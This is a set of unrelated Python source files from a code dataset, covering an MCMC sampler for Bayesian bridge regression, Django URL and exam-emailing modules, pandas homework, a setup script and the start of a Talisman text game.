mcmc_output['samples'].items()\n }\n if 'precond_blocksize' in mcmc_output:\n precond_blocksize = mcmc_output['precond_blocksize']\n else:\n precond_blocksize = 0\n\n thin, reg_exponent, mvnorm_method, global_shrinkage_update = (\n mcmc_output[key] for key in\n ['thin', 'reg_exponent', 'mvnorm_method', 'global_shrinkage_update']\n )\n\n # Initalize the regression coefficient sampler with the previous state.\n self.reg_coef_sampler = SparseRegressionCoefficientSampler(\n init, self.prior_sd_for_unshrunk, mvnorm_method\n )\n self.reg_coef_sampler.set_internal_state(mcmc_output['_reg_coef_sampler_state'])\n\n if deallocate:\n mcmc_output.clear()\n\n next_mcmc_output = self.gibbs(\n 0, n_iter, thin, reg_exponent, init, mvnorm_method=mvnorm_method,\n precond_blocksize=precond_blocksize,\n global_shrinkage_update=global_shrinkage_update,\n _add_iter_mode=True\n )\n if merge:\n next_mcmc_output \\\n = self.merge_outputs(mcmc_output, next_mcmc_output)\n\n return next_mcmc_output\n\n def merge_outputs(self, mcmc_output, next_mcmc_output):\n\n samples = mcmc_output['samples']\n next_samples = next_mcmc_output['samples']\n next_mcmc_output['samples'] = {\n key : np.concatenate(\n (samples[key], next_samples[key]), axis=-1\n ) for key in samples.keys()\n }\n next_mcmc_output['n_post_burnin'] += mcmc_output['n_post_burnin']\n next_mcmc_output['runtime'] += mcmc_output['runtime']\n\n return next_mcmc_output\n\n def gibbs(self, n_burnin, n_post_burnin, thin=1, reg_exponent=.5,\n init={}, mvnorm_method='cg', precond_blocksize=0, seed=None,\n global_shrinkage_update='sample', _add_iter_mode=False):\n \"\"\"\n MCMC implementation for the Bayesian bridge.\n\n Parameters\n ----------\n n_burnin : int\n number of burn-in samples 
to be discarded\n n_post_burnin : int\n number of posterior draws to be saved\n mvnorm_method : str, {'direct', 'cg'}\n precond_blocksize : int\n size of the block preconditioner\n global_shrinkage_update : str, {'sample', 'optimize', None}\n\n \"\"\"\n\n if not _add_iter_mode:\n self.rg.set_seed(seed)\n\n if self.model not in ('linear', 'logit'):\n raise NotImplementedError()\n\n n_iter = n_burnin + n_post_burnin\n\n # Initial state of the Markov chain\n beta, sigma_sq, obs_prec, lshrink, gshrink, init = \\\n self.initialize_chain(init)\n\n if not _add_iter_mode:\n self.reg_coef_sampler = SparseRegressionCoefficientSampler(\n init, self.prior_sd_for_unshrunk, mvnorm_method\n )\n\n # Pre-allocate\n samples = {}\n self.pre_allocate(samples, n_post_burnin, thin)\n n_cg_iter = np.zeros(n_iter)\n\n # Start Gibbs sampling\n start_time = time.time()\n for mcmc_iter in range(1, n_iter + 1):\n\n if self.model == 'linear':\n obs_prec = np.ones(self.n_obs) / sigma_sq\n\n beta, n_cg_iter[mcmc_iter - 1] = self.update_beta(\n obs_prec, gshrink, lshrink, mvnorm_method, precond_blocksize\n )\n\n obs_prec, sigma_sq = self.update_obs_precision(beta)\n\n # Draw from gshrink | \\beta and then lshrink | gshrink, \\beta.\n # (The order matters.)\n gshrink = self.update_global_shrinkage(\n gshrink, beta[self.n_unshrunk:], reg_exponent, global_shrinkage_update)\n\n lshrink = self.update_local_shrinkage(\n gshrink, beta[self.n_unshrunk:], reg_exponent)\n\n self.store_current_state(samples, mcmc_iter, n_burnin, thin,\n beta, lshrink, gshrink, sigma_sq, obs_prec, reg_exponent)\n\n runtime = time.time() - start_time\n mcmc_output = {\n 'samples': samples,\n 'init': init,\n 'n_burnin': n_burnin,\n 'n_post_burnin': n_post_burnin,\n 'thin': thin,\n 'seed': seed,\n 'n_coef_wo_shrinkage': self.n_unshrunk,\n 'prior_sd_for_unshrunk': self.prior_sd_for_unshrunk,\n 'reg_exponent': reg_exponent,\n 'mvnorm_method': mvnorm_method,\n 'runtime': runtime,\n 'global_shrinkage_update': global_shrinkage_update,\n '_random_gen_state': self.rg.get_state(),\n '_reg_coef_sampler_state': self.reg_coef_sampler.get_internal_state()\n }\n if mvnorm_method == 'cg':\n mcmc_output['n_cg_iter'] = n_cg_iter\n if precond_blocksize > 0:\n mcmc_output['precond_blocksize'] = precond_blocksize\n\n return mcmc_output\n\n def pre_allocate(self, samples, n_post_burnin, thin):\n\n n_sample = math.floor(n_post_burnin / thin) # Number of samples to keep\n samples['beta'] = np.zeros((self.n_pred, n_sample))\n samples['local_shrinkage'] = np.zeros((self.n_pred - self.n_unshrunk, n_sample))\n samples['global_shrinkage'] = np.zeros(n_sample)\n if self.model == 'linear':\n samples['sigma_sq'] = np.zeros(n_sample)\n elif self.model == 'logit':\n samples['obs_prec'] = np.zeros((self.n_obs, n_sample))\n samples['logp'] = np.zeros(n_sample)\n\n return\n\n def initialize_chain(self, init):\n # Choose the user-specified state if provided, the default ones otherwise.\n\n if 'beta' in init:\n beta = init['beta']\n if not len(beta) == self.n_pred:\n raise ValueError('An invalid initial state.')\n else:\n beta = np.zeros(self.n_pred)\n if 'intercept' in init:\n beta[0] = init['intercept']\n\n if 'sigma' in init:\n sigma_sq = init['sigma'] ** 2\n else:\n sigma_sq = np.mean((self.y - self.X.dot(beta)) ** 2)\n\n if 'obs_prec' in init:\n obs_prec = np.ascontiguousarray(init['obs_prec'])\n # Cython requires a C-contiguous array.\n if not len(obs_prec) == self.n_obs:\n raise ValueError('An invalid initial state.')\n elif self.model == 'logit':\n obs_prec = 
self.compute_polya_gamma_mean(self.n_trial, self.X.dot(beta))\n else:\n obs_prec = None\n\n if 'local_shrinkage' in init:\n lshrink = init['local_shrinkage']\n if not len(lshrink) == (self.n_pred - self.n_unshrunk):\n raise ValueError('An invalid initial state.')\n else:\n lshrink = np.ones(self.n_pred - self.n_unshrunk)\n\n if 'global_shrinkage' in init:\n gshrink = init['global_shrinkage']\n else:\n gshrink = .01\n\n init = {\n 'beta': beta,\n 'sigma_sq': sigma_sq,\n 'obs_prec': obs_prec,\n 'local_shrinkage': lshrink,\n 'global_shrinkage': gshrink\n }\n\n return beta, sigma_sq, obs_prec, lshrink, gshrink, init\n\n def compute_polya_gamma_mean(self, shape, tilt):\n min_magnitude = 1e-5\n pg_mean = shape.copy() / 2\n is_nonzero = (np.abs(tilt) > min_magnitude)\n pg_mean[is_nonzero] \\\n *= 1 / tilt[is_nonzero] \\\n * (np.exp(tilt[is_nonzero]) - 1) / (np.exp(tilt[is_nonzero]) + 1)\n return pg_mean\n\n def update_beta(self, obs_prec, gshrink, lshrink, mvnorm_method, precond_blocksize):\n\n if self.model == 'linear':\n y_gaussian = self.y\n elif self.model == 'logit':\n y_gaussian = (self.y - self.n_trial / 2) / obs_prec\n\n beta, n_cg_iter = self.reg_coef_sampler.sample_gaussian_posterior(\n y_gaussian, self.X, obs_prec, gshrink, lshrink,\n mvnorm_method, precond_blocksize\n )\n\n return beta, n_cg_iter\n\n def update_obs_precision(self, beta):\n\n sigma_sq = None\n obs_prec = None\n if self.model == 'linear':\n resid = self.y - self.X.dot(beta)\n scale = np.sum(resid ** 2) / 2\n sigma_sq = scale / self.rg.np_random.gamma(self.n_obs / 2, 1)\n elif self.model == 'logit':\n obs_prec = self.rg.polya_gamma(\n self.n_trial, self.X.dot(beta),self.X.shape[0])\n\n return obs_prec, sigma_sq\n\n def update_global_shrinkage(\n self, gshrink, beta_with_shrinkage, reg_exponent, method='sample'):\n # :param method: {\"sample\", \"optimize\", None}\n\n if method == 'optimize':\n gshrink = self.monte_carlo_em_global_shrinkage(\n beta_with_shrinkage, reg_exponent)\n\n elif method == 'sample':\n\n if self.prior_type['global_shrinkage'] == 'jeffreys':\n\n # Conjugate update for phi = 1 / gshrink ** reg_exponent\n shape = beta_with_shrinkage.size / reg_exponent\n scale = 1 / np.sum(np.abs(beta_with_shrinkage) ** reg_exponent)\n phi = self.rg.np_random.gamma(shape, scale=scale)\n gshrink = 1 / phi ** (1 / reg_exponent)\n\n elif self.prior_type['global_shrinkage'] == 'half-cauchy':\n\n gshrink = self.slice_sample_global_shrinkage(\n gshrink, beta_with_shrinkage, self.prior_param['global_shrinkage']['scale'], reg_exponent\n )\n else:\n raise NotImplementedError()\n\n return gshrink\n\n def monte_carlo_em_global_shrinkage(\n self, beta_with_shrinkage, reg_exponent):\n phi = len(beta_with_shrinkage) / reg_exponent \\\n / np.sum(np.abs(beta_with_shrinkage) ** reg_exponent)\n gshrink = phi ** - (1 / reg_exponent)\n return gshrink\n\n def slice_sample_global_shrinkage(\n self, gshrink, beta_with_shrinkage, global_scale, reg_exponent):\n \"\"\" Slice sample phi = 1 / gshrink ** reg_exponent. 
\"\"\"\n\n n_update = 10 # Slice sample for multiple iterations to ensure good mixing.\n\n # Initialize a gamma distribution object.\n shape = (beta_with_shrinkage.size + 1) / reg_exponent\n scale = 1 / np.sum(np.abs(beta_with_shrinkage) ** reg_exponent)\n gamma_rv = sp.stats.gamma(shape, scale=scale)\n\n phi = 1 / gshrink\n for i in range(n_update):\n u = self.rg.np_random.uniform() \\\n / (1 + (global_scale * phi ** (1 / reg_exponent)) ** 2)\n upper = (np.sqrt(1 / u - 1) / global_scale) ** reg_exponent\n # Invert the half-Cauchy density.\n phi = gamma_rv.ppf(gamma_rv.cdf(upper) * self.rg.np_random.uniform())\n if np.isnan(phi):\n # Inverse CDF method can fail if the current conditional\n # distribution is drastically different from the previous one.\n # In this case, ignore the slicing variable and just sample from\n # a Gamma.\n phi = gamma_rv.rvs()\n gshrink = 1 / phi ** (1 / reg_exponent)\n\n return gshrink\n\n\n def update_local_shrinkage(self, gshrink, beta_with_shrinkage, reg_exponent):\n\n lshrink_sq = 1 / np.array([\n 2 * self.rg.tilted_stable(reg_exponent / 2, (beta_j / gshrink) ** 2)\n for beta_j in beta_with_shrinkage\n ])\n lshrink = np.sqrt(lshrink_sq)\n\n # TODO: Pick the lower and upper bound more carefully.\n if np.any(lshrink == 0):\n warn_message_only(\n \"Local shrinkage parameter under-flowed. Replacing with a small number.\")\n lshrink[lshrink == 0] = 10e-16\n elif np.any(np.isinf(lshrink)):\n warn_message_only(\n \"Local shrinkage parameter under-flowed. Replacing with a large number.\")\n lshrink[np.isinf(lshrink)] = 2.0 / gshrink\n\n return lshrink\n\n def store_current_state(self, samples, mcmc_iter, n_burnin, thin,\n beta, lshrink, gshrink, sigma_sq, obs_prec, reg_exponent):\n\n if mcmc_iter > n_burnin and (mcmc_iter - n_burnin) % thin == 0:\n index = math.floor((mcmc_iter - n_burnin) / thin) - 1\n samples['beta'][:, index] = beta\n samples['local_shrinkage'][:, index] = lshrink\n samples['global_shrinkage'][index] = gshrink\n if self.model == 'linear':\n samples['sigma_sq'][index] = sigma_sq\n elif self.model == 'logit':\n samples['obs_prec'][:, index] = obs_prec\n samples['logp'][index] = \\\n self.compute_posterior_logprob(beta, gshrink, sigma_sq, reg_exponent)\n\n return\n\n def compute_posterior_logprob(self, beta, gshrink, sigma_sq, reg_exponent):\n\n prior_logp = 0\n\n if self.model == 'logit':\n predicted_prob = 1 / (1 + np.exp( - self.X.dot(beta)))\n machine_prec = 2. ** - 53\n within_bd = np.logical_and(\n predicted_prob > machine_prec,\n predicted_prob < 1. 
- machine_prec\n )\n loglik = np.sum(\n self.y[within_bd] * np.log(predicted_prob[within_bd]) \\\n + (self.n_trial - self.y)[within_bd]\n * np.log(1 - predicted_prob[within_bd])\n )\n elif self.model == 'linear':\n loglik = - len(self.y) * math.log(sigma_sq) / 2 \\\n - np.sum((self.y - self.X.dot(beta)) ** 2) / sigma_sq\n prior_logp += - math.log(sigma_sq) / 2\n\n n_shrunk_coef = len(beta) - self.n_unshrunk\n\n # Contribution from beta | gshrink.\n prior_logp += \\\n - n_shrunk_coef * math.log(gshrink) \\\n - np.sum(np.abs(beta[self.n_unshrunk:] / gshrink) ** reg_exponent)\n\n # for coefficients without shrinkage.\n prior_logp += - 1 / 2 * np.sum(\n (beta[:self.n_unshrunk] / self.prior_sd_for_unshrunk) ** 2\n )\n prior_logp += - np.sum(np.log(\n self.prior_sd_for_unshrunk[self.prior_sd_for_unshrunk < float('inf')]\n ))\n if self.prior_type['global_shrinkage'] == 'jeffreys':\n prior_logp += - math.log(gshrink)\n else:\n raise NotImplementedError()\n\n logp = loglik + prior_logp\n\n return logp\n","sub_path":"bayesbridge/bayesbridge.py","file_name":"bayesbridge.py","file_ext":"py","file_size_in_byte":18504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"321165294","text":"__author__ = 'gchrysos'\n# definition of paths and folders useful for the pipeline.\n# Change with caution, as changes will be reflected to the whole pipeline.\n\nimport os\nsep = os.path.sep # separator (should be '/' for Linux and '\\' for Windows).\n\n__p_base_db = '/vol/atlas/databases/'\n_p_base_personal = '/vol/atlas/homes/grigoris/'\n\n# paths of public databases used for trainings\npath_to_helen = __p_base_db + 'helen/trainset/' # helen trainset\npath_to_ibug = __p_base_db + 'ibug/'\npath_to_lfpw = __p_base_db + 'lfpw/trainset/'\npath_to_cofw = _p_base_personal + 'external/cofw/frames/trainset/'\npath_pascal_base = _p_base_personal + 'external/VOCdevkit/VOC2007/'\npath_closed_eyes = _p_base_personal + 'Databases/eyes/grigoris_competition_8_2015/frames/'\n\npath_pickles = _p_base_personal + 'company_videos/pickles/'\npath_shape_pred = _p_base_personal + 'raps_menpo/shape_predictor_68_face_landmarks.dat' # predictor data trained to be used from dlib shape predictor\n\n# confirm that the ones above are valid paths\nfrom utils import check_if_path\ndef __db_p(path, db_name):\n return check_if_path(path, 'The database {} is not in the path provided ({}).'.format(db_name, path))\n\nif not (__db_p(path_to_helen, 'helen') and __db_p(path_to_ibug, 'ibug') and __db_p(path_pascal_base, 'pascal'))\\\n and (__db_p(path_to_lfpw, 'lfpw')):\n print('Potential problem if one of the databases are not in the path provided.')\n\n\n# folders for reading and writing in the project clips\nfoldvis = 'visualisations' + sep # folder where all image visualisations are\nframes = 'frames' + sep # folder for reading the frames/images\nfoldcmp = 'compare' + sep # folder for visual comparisons (will be inside visualisations by default)\n\nvisual = 0 # whether the landmarks should be exported during the process (1 for yes)\nimg_type_out = '.png' # extension (and type) of the images that will be exported\npts_type_out = '.pts'\n\nlist_done = [] # clips that should not be processed\n# list_done =['830386', '821238', '830183'];\n\n# definition of colours for visualisation\ncolour = ['r', 'b', 'g', 'c', 'm', 'k', 'w']\ncol_len = len(colour)\n\n# First refers to original image, second to cropped one.\nrender_options = {'colours': [colour,\n colour],\n 'sizes': [[2]*10,\n [2]*10],\n 'edgesizes': 
[[1]*10,\n [2]*10]}\n\n\n# common imports for all files\nimport os\nimport sys\nimport numpy as np\nimport glob\nfrom datetime import datetime\n\n","sub_path":"utils/path_and_folder_definition.py","file_name":"path_and_folder_definition.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"174971151","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'fundraise.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^', include('upnextme.urls',\n namespace='upnextme')),\n url(r'^$', 'upnextme.views.index', name='index'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^ckeditor/', include('ckeditor_uploader.urls')),\n url(r'^chaining/', include('smart_selects.urls')),\n url(r'^grappelli/', include('grappelli.urls')),\n url('', include('social.apps.django_app.urls', namespace='social')),\n url('', include('django.contrib.auth.urls', namespace='auth')),\n )\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","sub_path":"fundraise/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"78222097","text":"class Option(object):\n def __init__(self):\n self.batchsize = 128\n self.latentsize = 100\n self.y_ebdsize = 28\n self.latentoutsize = 1024*2*2\n self.num_classes = 16\n self.micro_in_macro = 4\n self.macro_in_full = 4\n self.datadir='../input/img_align_celeba/img_align_celeba'\n self.macro_size = 64\n self.micro_size = 32\n self.full_size = 128\n self.LAMBDA = 10\n self.ALPHA = 100\n self.epoch = 50\n self.max_dataset = 0\n self.my_model_dir = 'my_model'\n self.showgrad = False","sub_path":"option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"264480022","text":"from .script import Qp\nfrom .models import Question, Script\nfrom django.template.loader import render_to_string\nfrom django.conf import settings\nfrom django.utils.http import urlsafe_base64_encode\nfrom django.utils.http import urlsafe_base64_decode\nfrom django.utils.encoding import force_bytes\nfrom django.utils.encoding import force_text\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.template.loader import render_to_string\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.urls import reverse\n\n\ndef set(title, users):\n\tqp=Qp(title)\n\ttemplate_name=\"qheader.html\"\n\tfor user in users:\n\t\tscript=Script()\n\t\tscript.title=title\n\t\tscript.userid=user\n\t\tscript.save()\n\t\t\n\t\tqp.olotpalot()\n\t\tfor frag in qp.fullset:\n\t\t\tattempt=Question()\n\t\t\tattempt.statement=frag.question\n\t\t\tattempt.option1 = frag.options[0].choice\n\t\t\tattempt.option2 = frag.options[1].choice\n\t\t\tattempt.option3 = frag.options[2].choice\n\t\t\tattempt.option4 = frag.options[3].choice\n\t\t\tcount=1\n\t\t\tfor answer in frag.options:\n\t\t\t\tif answer.ans:\n\t\t\t\t\tattempt.correct_ans=count\n\t\t\t\tcount+=1\n\t\t\tattempt.script = script\n\t\t\tattempt.save()\n\ndef sendotlforexam(title):\n\tpapers=Script.objects.filter(send_otl_script=False).filter(title=title)\n\ttext_content=\"Your 
one time link Email"\n\tsubject="Examination Script for " + title\n\ttemplate_name="otl.html"\n\tfrom_email=settings.EMAIL_HOST_USER\n\tfor paper in papers:\n\t\trecipients=[paper.userid.email]\n\n\t\tkwargs = {\n\t\t\t"scriptid64" : urlsafe_base64_encode(force_bytes(paper.id)),\n\t\t\t"token" : default_token_generator.make_token(paper.userid)\n\t\t}\n\t\tthe_url = reverse("exam_request", kwargs=kwargs)\n\t\totl_url = "{0}://{1}{2}".format("http", "www.drylab.in:8000", the_url)\n\n\t\tcontext = {\n\t\t\t'user': paper.userid,\n\t\t\t'otl_url': otl_url,\n\t\t}\n\t\thtml_content = render_to_string(template_name, context)\n\t\temail = EmailMultiAlternatives(subject, text_content, from_email, recipients)\n\t\temail.attach_alternative(html_content, "text/html")\n\t\temail.send()\n\t\tpaper.send_otl_script=True\n\t\tpaper.save()\n\t\tprint("Mail has been sent to {0}\n".format(paper.userid.email))\n\ndef evaluate(title):\n\tpapers=Script.objects.filter(received_script=True).filter(title=title)\n\tfor paper in papers:\n\t\tpaper.number_scored = 0\n\t\tref=paper.question_set.all()\n\t\t# Tally the ten stored answers (user_ans0..user_ans9) against the key.\n\t\tfor i in range(10):\n\t\t\tif getattr(paper, 'user_ans{0}'.format(i)) == ref[i].correct_ans:\n\t\t\t\tpaper.number_scored += 1\n\t\tpaper.save()\n\ndef sendresult(title):\n\tpapers=Script.objects.filter(received_script=True).filter(send_result=False).filter(title=title)\n\ttext_content="Your result for exam in " + title\n\tsubject="Examination result for " + title\n\ttemplate_name="result.html"\n\tfrom_email=settings.EMAIL_HOST_USER\n\tfor paper in papers:\n\t\trecipients = [paper.userid.email]\n\t\tcontext = {\n\t\t\t'script' : paper,\n\t\t\t'questions' : paper.question_set.all()\n\t\t}\n\t\thtml_content = render_to_string(template_name, context)\n\t\temail = EmailMultiAlternatives(subject, text_content, from_email, recipients)\n\t\temail.attach_alternative(html_content, "text/html")\n\t\temail.send()\n\t\tpaper.send_result=True\n\t\tpaper.save()\n\t\tprint("Mail has been sent to {0}\n".format(paper.userid.email))\n","sub_path":"exam/papersetting.py","file_name":"papersetting.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"409790496","text":"x=[0]*10\nlista=[]\ntot=0\ndias=0\nfor i in range(10):\n    x[i]=int(input())\n    tot+=x[i]\n    lista.append(x[i])\nmedia=tot/10\nfor i in range(10):\n    if x[i]>media:\n        dias+=1\nlista.sort()\nprint(lista[1])\nprint(lista[-1])\nprint(media)\nprint(dias)","sub_path":"Vetor/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"36009","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date  : 2020/8/16\n# @Author : xh.w\n# @File : job.py.py\n# Assignment: translate the following SQL statements into pandas\n\nimport pandas as 
pd\n\nimport pymysql\n\n\nsql = 'SELECT * FROM movies_info'\nconnect = pymysql.connect(\n    host='192.168.3.87',\n    port=3306,\n    user='root',\n    password='123456',\n    db='test'\n)\n\n# 1. SELECT * FROM data;\ndf = pd.read_sql(sql, connect)\n\n# 2. SELECT * FROM data LIMIT 10;\ndf.head(10)\n# 3. SELECT id FROM data; // id is a specific column of the data table\ndf['id']\n# 4. SELECT COUNT(id) FROM data;\ndf['id'].count()\n# 5. SELECT * FROM data WHERE id<1000 AND age>30;\ndf[(df['id'] < 1000) & (df['age'] > 30)]\n# 6. SELECT id,COUNT(DISTINCT order_id) FROM table1 GROUP BY id;\n# COUNT(DISTINCT ...) maps to nunique(); count() would count all rows.\ndf.groupby('id')['order_id'].nunique()\n# 7. SELECT * FROM table1 t1 INNER JOIN table2 t2 ON t1.id = t2.id;\n# table1 and table2 are DataFrames standing in for the SQL tables.\npd.merge(table1, table2, on='id', how='inner')\n# 8. SELECT * FROM table1 UNION SELECT * FROM table2;\n# UNION de-duplicates; UNION ALL would be a plain concat.\npd.concat([table1, table2]).drop_duplicates()\n# 9. DELETE FROM table1 WHERE id=10;\ndf.drop(df[df['id'] == 10].index, axis=0)\n# 10. ALTER TABLE table1 DROP COLUMN column_name;\ndf.drop('column_name', axis=1)\n\n","sub_path":"week04/homework/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"333216103","text":"from setuptools import setup, find_packages\nimport os\nimport jetpack\n\nhere = os.path.abspath(os.path.dirname(__file__))\ntry:\n    README = open(os.path.join(here, 'README.md')).read()\nexcept IOError:\n    README = ''\n\nsetup(name='jetpack',\n      version=jetpack.__version__,\n      author='Niru Maheswaranathan',\n      author_email='nirum@stanford.edu',\n      url='https://github.com/nirum/jetpack.git',\n      requires=['numpy', 'scipy', 'matplotlib', 'emoji'],\n      long_description=README,\n      packages=find_packages(),\n      license='LICENSE.md'\n      )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"189702616","text":"'''\nTalisman v0.2\n\nRoadmap:\nPlaces\nObjects\nFollowers\nPurchases\nSentinel\n\ninitialized in trinket.io\n'''\n\n# region: Initialization\nimport random as r # Random Module\n\nerror="\nUh, I'm not quite sure what that means. 
Please try again: \" # Error Prompt\nimplem=\"Unfortunately this feature has not yet been implemented.\" # Implementation Error Prompt\n\n# Outer Region Board\nouter=(\"Tavern\",\"Southwestern Fields\",\"Ruins\",\"Western Plains\",\"Forest\",\"Northwestern Fields\",\"Village\",\"Northern Fields\",\"Graveyard\",\"Northern Woods\",\"Sentinel Space\",\"Northern Hills\",\"Chapel\",\"Northeastern Fields\",\"Crags\",\"Eastern Plains\",\"Eastern Woods\",\"Southeastern Fields\",\"City\",\"Southern Fields\",\"Southern Hills\",\"Midsouthern Plains\",\"Southern Woods\",\"Southeastern Plains\")\n\n# Adventure Cards\nadventures = [\"Angel\",\"Blizzard\",\"Book of Spells\",\"Devil\",\"Evil Darkness\",\"Imp\",\"Magical Vortex\",\"Market Day\",\"Mephistopheles\",\"Pestilence\",\"Raiders\",\"Siren\",\"Storm\",\"Wolf\",\"Ape\",\"Bear\",\"Lion\",\"Serpent\",\"Giant\",\"Spectre\",\"Demon\",\"Enchanter\",\"Fairy\",\"Healer\",\"Hermit\",\"Mage\",\"Phantom\",\"Sorcerer\",\"Witch\",\"Alchemist\",\"Cursed by a Hag\",\"Gnome\",\"Maiden\",\"Mercenary\",\"Mule\",\"Pixie\",\"Poltergeist\",\"Prince\",\"Princess\",\"Unicorn\",\"Amulet\",\"Cross\",\"Holy Grail\",\"Magic Belt\",\"Orb of Knowledge\",\"Potion of Strength\",\"Ring\",\"Solomon's Crown\",\"Wand\",\"Holy Lance\",\"Runesword\",\"Raft\",\"Water Bottle\",\"Armour\",\"Helmet\",\"Shield\",\"Axe\",\"Cave\",\"Fountain of Wisdom\",\"Magic Portal\",\"Magic Stream\",\"Market\",\"Marsh\",\"Maze\",\"Pool of Life\",\"Shrine\"]+[\"Wild Boar\",\"Goblin\",\"Hobgoblin\",\"Bandit\",\"Ogre\",\"Lemure\",\"Shadow\",\"Ghost\",\"Wraith\",\"Guide\",\"Talisman\",\"Sword\"]*2+[\"Dragon\",\"Two Bags of Gold\"]*3+[\"Bag of Gold\"]*8\nevents = [\"Angel\",\"Blizzard\",\"Book of Spells\",\"Devil\",\"Evil Darkness\",\"Imp\",\"Magical Vortex\",\"Market Day\",\"Mephistopheles\",\"Pestilence\",\"Raiders\",\"Siren\",\"Storm\"]\nanimals = [\"Wild Boar\",\"Wolf\",\"Ape\",\"Bear\",\"Lion\",\"Serpent\"]\ndragons = [\"Dragon\"]\nmonsters = [\"Goblin\",\"Hobgoblin\",\"Bandit\",\"Ogre\",\"Giant\"]\nspirits = [\"Lemure\",\"Shadow\",\"Spectre\",\"Ghost\",\"Wraith\",\"Demon\"]\nenemies = animals + dragons + monsters + spirits\nstrangers = [\"Enchanter\",\"Fairy\",\"Healer\",\"Hermit\",\"Mage\",\"Phantom\",\"Sorcerer\",\"Witch\"]\nfollowers = [\"Alchemist\",\"Cursed by a Hag\",\"Gnome\",\"Guide\",\"Maiden\",\"Mercenary\",\"Mule\",\"Pixie\",\"Poltergeist\",\"Prince\",\"Princess\",\"Unicorn\"]\nobjects = [\"Amulet\",\"Cross\",\"Holy Grail\",\"Magic Belt\",\"Orb of Knowledge\",\"Potion of Strength\",\"Ring\",\"Solomon's Crown\",\"Talisman\",\"Wand\",\"Holy Lance\",\"Runesword\",\"Bag of Gold\",\"Raft\",\"Two Bags of Gold\",\"Water Bottle\",\"Armour\",\"Helmet\",\"Shield\",\"Axe\",\"Sword\"]\nmagicobjects = [\"Amulet\",\"Cross\",\"Holy Grail\",\"Magic Belt\",\"Orb of Knowledge\",\"Potion of Strength\",\"Ring\",\"Solomon's Crown\",\"Talisman\",\"Wand\",\"Holy Lance\",\"Runesword\"]\nweapons = [\"Holy Lance\",\"Runesword\",\"Axe\",\"Sword\"]\narmours = [\"Armour\",\"Helmet\",\"Shield\",\"Axe\",\"Sword\"]\n\n# Character Template\nemptydict={\n \"name\":\"\",\n \"start\":\"\",\n \"align\":\"\",\n \"strength\":0,\n \"craft\":0,\n \"life\":0,\n \"fate\":0,\n \"gold\":1,\n \"addinfo\":\"\",\n \"space\":\"\",\n \"mins\":0,\n \"minc\":0,\n \"maxl\":0,\n \"maxf\":0\n}\n\n# Cards on Spaces\nspacedict={}\nfor space in outer:\n spacedict.update({space:[]})\n\n# Dice Rolling\ndef roll():\n return r.choice(range(1,7))\n\n# Game Over\ndef gameover():\n print(\"\\nSorry, but that's the whole game at the moment. 
Check again later, more coming soon! In the meantime, check out your stats: ")\n    print("Strength: {strength}\nCraft: {craft}\nGold: {gold}\nFate: {fate}\nLife: {life}\nAlignment: {align}".format(**chardict))\n    quit()\n#endregion\n\n# region: Player functions\n# Lose Life\ndef wound():\n    chardict["life"]-=1\n    if chardict["life"]<=0:\n        print("Sorry, you have died. GAME OVER")\n        gameover()\n# Heal Life\ndef heal(n):\n    if chardict["life"]>=chardict["maxl"]:\n        print("Sorry, you are already at max life.")\n    else:\n        # Heal up to n lives, capped at the starting quota.\n        chardict["life"]=min(chardict["life"]+n,chardict["maxl"])\n        if chardict["life"]==chardict["maxl"]:\n            print("You are now at max life.")\n# Lose Gold\ndef poor(n):\n    if chardict["gold"]-n>0:\n        chardict["gold"]-=n\n    else:\n        chardict["gold"]=0\n        print("You are now bankrupt.")\n# Lose Strength\ndef weak():\n    if chardict["strength"]>chardict["mins"]:\n        chardict["strength"]-=1\n    else:\n        print("Your strength is already at its minimum.")\n# Lose Craft\ndef dumb():\n    if chardict["craft"]>chardict["minc"]:\n        chardict["craft"]-=1\n    else:\n        print("Your craft is already at its minimum.")\n# Lose Fate\ndef losefate():\n    if chardict["fate"]>0:\n        chardict["fate"]-=1\n    else:\n        print("You have no fate left.")\n# Replenish Fate\ndef replenish():\n    if chardict["fate"]>=chardict["maxf"]:\n        print("You are already at max fate.")\n    else:\n        chardict["fate"] = chardict["maxf"]\n# Change Alignment\ndef realign(new):\n    if chardict["align"] != new: chardict["align"] = new\n    else: print("You were already {align}.".format(**chardict))\n#endregion\n\n# region: Turns and battles\n# Game Turn\ndef turn():\n    x=roll()\n    while True:\n        side=input("Would you like to move to the {} (1) or the {} (2)? ".format(outer[(outer.index(chardict["space"])+x)%len(outer)],outer[(outer.index(chardict["space"])-x)%len(outer)]))\n        if side=="1":\n            chardict["space"]=outer[(outer.index(chardict["space"])+x)%len(outer)]\n            print("\nYou are at the {space}.".format(**chardict))\n            encounter()\n            break\n        elif side=="2":\n            chardict["space"]=outer[(outer.index(chardict["space"])-x)%len(outer)]\n            print("\nYou are at the {space}.".format(**chardict))\n            encounter()\n            break\n        else:\n            print(error)\n# 